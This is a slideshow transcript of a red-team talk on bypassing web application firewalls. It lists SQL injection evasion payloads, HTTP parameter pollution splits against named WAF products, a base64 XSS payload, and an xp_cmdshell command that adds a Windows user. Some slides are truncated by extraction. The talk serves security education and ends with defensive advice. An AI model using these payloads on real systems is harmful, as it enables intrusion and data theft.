Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web Application Firewall: Suckseed or Succeed


Published on

Breach WAF with advanced techniques

Web Application Firewall: Suckseed or Succeed

  1. 1. Web Application Firewall (WAF) Suckseed or Succeed !?Mr.Prathan PhongthiproekConsulting Manager, Red TeamACIS Professional Center
  2. 2. Who am I ?ACIS Professional Center Manager of the Red Team Specializing in Attack & Penetration Information Security Consulting Manager Instructor and SpeakerFounder of CWH Underground Hacker Aka 0x7a657133756c
  3. 3. Let’s RevealIntroduction to Web ApplicationFirewall (WAF)Breach it !! Filter Evasion HTTP Parameter Contamination HTTP Pollution: Split and JoinConclusion
  4. 4. Introduction to WebApplication Firewall (WAF)
  5. 5. Web Application Hacking7 of 10 sites are vulnerable70% of Cyber attacks are on web ports95% of companies are hacked throughweb portsAnonymous and LulzsecHacker with Operation#AntiSec
  6. 6. Web Application HackingTop 3 Web App Attacks Cross Site Scripting File Inclusion (Remote/Local) SQL Injection (Normal/Blind/Time based/Regex...)
  7. 7. Misunderstand for Harden Web Application
  8. 8. What’s WAF ?Emerged from IDS/IPS focused on HTTPprotocol and HTTP related attacksUsually contain a lot of complexreg-exp rules to match (Blacklist)For most WAF vendors they are “Closelyguarded secrets”Open-source WAFs (Mod_security andPHPIDS) have open source rules
  9. 9. Understand Blacklist
  10. 10. Detection and ProtectionSQL InjectionCross Site ScriptingLocal and Remote File InclusionCode/Command InjectionDirectory TraversalBuffer OverflowCookie PoisoningParameter TamperingUpload File Mis-HandlingInformation DisclosureEtc...
  11. 11. WAFs VendorsArmorize Bee-wareBarracuda BinarySecCisco ACE Mod SecurityCitrix Netscaler WebKnightF5 DenyAllImperva SecureSphere FortifyRadware Appwall VisonysProfense Pentasecurity Other..
  12. 12. WAF implementation
  13. 13. Breach it !! (CMS and WAFs) “เอาอยู่ เอาอย.......แตกแล้ว” ู่
  14. 14. Filter Evasion (SQLi)PHP: Magic_quote On,Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’
  15. 15. Filter Evasion (SQLi)PHP: Magic_quote On,Mysql_real_escape_string, Addslashes ‘ “ -> ’ ” id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
  16. 16. Filter Evasion (SQLi)PHP: Magic_quote On,Mysql_real_escape_string, Addslashes String to ASCII id=1 and 1=2 union select 1,load_file(CHAR (47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102 ,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
  17. 17. Filter Evasion (SQLi)Comments //,--,/**/,/*,#,%00 id=1+un/**/ion+se/**/lect+1,2,3--Case Changing (lower case) /unionsselect/g id=1+UnIoN/**/SeLecT/**/1,2,3--Replaced keywords id=1+UnunionIoN+SeselectLecT+1,2,3--
  18. 18. Filter Evasion (SQLi)Case Study: NukeSentinel (PHP Nuke) Encode to Hex Forbidden:**/union/**/select....... Bypass: Bypass:**%2Funion%2F**%2Fselect.......
  19. 19. Filter Evasion (SQLi)Buffer Overflow (For C language) id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT +1,version(),3,database(),user(),6,7,8,9,10--
  20. 20. Filter Evasion (SQLi)Inline Comments (/*!......*/) A lot of WAFs was bypassed Bypass IPS and Timeout MySQL Only ( comments.html) /unionsselect/ig id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/) +FrOm/*!information_schema*/.tables/*!WhErE*/+/*! TaBlE_sChEMa*/+like+database()--
  21. 21. Filter Evasion (SQLi)Inline Comments (/*!......*/)
  22. 22. Filter Evasion (SQLi)Censor
  23. 23. Filter Evasion (SQLi)Other Bypasses: and -> && or -> || = -> like substring() -> substr(), mid(), strcmp() ascii() -> hex(), bin(), char(), ord() benchmark() -> sleep() Whitespace -> (),/**/,%0b isnull, between
  24. 24. Filter Evasion (SQLi)Case Study: PHPIDS
  25. 25. Filter Evasion (SQLi)Case Study: PHPIDS
  26. 26. Filter Evasion (SQLi)Case Study: PHPIDS
  27. 27. Filter Evasion (SQLi) Case Study: Mod Security CRSSecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "bunionb.{1,100}?bselectb" "phase2,rev:2.2.1,capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:SQLInjection Attack,id:959047,tag:WEB_ATTACK/SQL_INJECTION,tag:WASCTC/WASC-19,tag:OWASP_TOP_10/A1,tag:OWASP_AppSensor/CIE1,tag:PCI/6.5.2,logdata:%{TX.0},severity:2,setvar:tx.msg=%{rule.msg},setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
  28. 28. Filter Evasion (SQLi)Case Study: Mod Security CRS*%2F*bar%0D%0Aselect %23foo%0D%0A1%2C2%2Ccurrent_user 0 div 1 union#foo*/*bar select#foo 1,2,current_user 0 div 1 union select 1,2,current_user
  29. 29. Filter EvasionCross Site Scripting (XSS) Forbidden: Bypass: html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=File Inclusion Forbidden: Bypass: Bypass: passwd
  30. 30. HTTP Parameter Contamination
  31. 31. HTTP Parameter ContaminationBypass Mod_Security SQLi rule(modsecurity_crs_41)Bypass URLScan 3.1DenyQueryStringSequences rulesBypass AQTRONIX Webknight WAF with “%”
  32. 32. HTTP Parameter ContaminationCase Study: AQTRONIX Webknight an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables) 10 and 1=0/(select top 1 table_name from information_schema.tables)
  33. 33. HTTP Pollution: Split and Join HPP is a quite simple but effective hacking technique HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query string Focus on ASP/ A lot of WAF was bypassed
  34. 34. HTTP Pollution: Split and Join
  35. 35. HTTP Pollution: Split and Join
  36. 36. HTTP Pollution: Split and Join
  37. 37. HTTP Pollution: Split and Join Basic Attack Forbidden: name,password from user Bypass: name&q=password from user q=select name q=password from user q=select name,password from user
  38. 38. HTTP Pollution: Split and Join HPP+Inline Comment (Bypass Commercial WAF) Forbidden: name,password from user Bypass:*&q=*/name&q=password/*&q=*/ from/*&q=*/user q=select/* q=*/name q=password/* q=*/from/* q=*/user q=select/*,*/name,password/*,*/from/*,*/user q=select name,password from user
  39. 39. HTTP Pollution: Split and Join
  40. 40. HTTP Pollution: Split and Join Case study: IBM Web Application Firewall (2011-6-21) Forbidden:; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT /add” -- Bypass:; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ “net user lucifer UrWaFisShiT” /*&id=1*/ -- id=1’; /* id=1*/ EXEC /* id=1*/ master..xp_cmdshell /* id=1*/ “net user lucifer UrWaFisShiT” /* id=1*/ --id=1’; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ “net user lucifer UrWaFisShiT” /*,1*/ --id=1’; EXEC master..xp_cmdshell “net user lucifer UrWaFisShiT” --
  41. 41. “ประเทศไทยต้องการ ความเปลี่ยนแปลง ถึงเวลาที่ทุกคนใน ประเทศตื่นตัวได้แล้ว ความโง่เขลาจักต้องหมดสิ้นไป”
  42. 42. How to protect your website ?Implement Secure Software Development LifeCycle (SSDLC)Secure Coding: Validate all inputs and outputsPentest before OnlineHarden it !!Re-visit AgainDeploy WAF (Optional)
  43. 43. Conclusion WAF is not the long-expected It’s functional limitations, WAF is not able to protect a web app from all possible vulnerabilities It’s necessary to adapt WAF filter to the particular web app being protected WAF doesn’t eliminate a vulnerability, It just partly screens the attack vector It suckseed or succeed !?“Security Products not able to 100% protect from damn config/coding of admin. Just need a time and imagination for breach it !!”
  44. 44. Greetz To..ACIS-Red TeamKyleJohannes DahseAhmad MaulanaLuca CarettoniStefano di PaolaIvan MarkovicAll WAF products that I breached